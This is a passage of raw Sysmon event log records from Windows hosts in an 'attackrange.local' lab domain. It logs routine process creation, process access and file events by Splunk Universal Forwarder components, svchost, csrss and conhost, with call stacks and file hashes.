154100x80000000000000001061458Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:24.481{7F8C56E7-525C-6063-3201-00000000AF01}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246271Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.894{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E138E371A3282139B8EDC7FFE2D46749,SHA256=C07CB571FCEE1EAAE061210BFF751A078A7C3389F7F7C619D17E5460816324EE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246270Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.707{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-525C-6063-C522-00000000AF01}3384C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246269Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.707{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246268Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.707{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246267Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.707{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246266Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.707{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246265Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.707{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246264Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.707{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246263Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.707{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246262Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.707{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246261Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.707{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246260Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.707{CB4067E1-304A-6062-0500-00000000AF01}392936C:\Windows\system32\csrss.exe{CB4067E1-525C-6063-C522-00000000AF01}3384C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246259Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.707{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-525C-6063-C522-00000000AF01}3384C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246258Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.707{CB4067E1-525C-6063-C522-00000000AF01}3384C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246257Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.597{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE6609F743407ACF69558EEAB53A48DE,SHA256=6E2935087B59192E057AE2040D3FEA6633A6230D293670034C62AEAA1D2B1093,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246256Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.160{CB4067E1-525C-6063-C422-00000000AF01}7002432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246255Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.035{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-525C-6063-C422-00000000AF01}700C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246254Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.035{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246253Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.035{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246252Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.035{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246251Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.035{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246250Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.035{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246249Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.035{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246248Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.035{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246247Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.035{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246246Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.035{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246245Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:24.035{CB4067E1-304A-6062-0500-00000000AF01}392508C:\Windows\system32\csrss.exe{CB4067E1-525C-6063-C422-00000000AF01}700C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246244Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 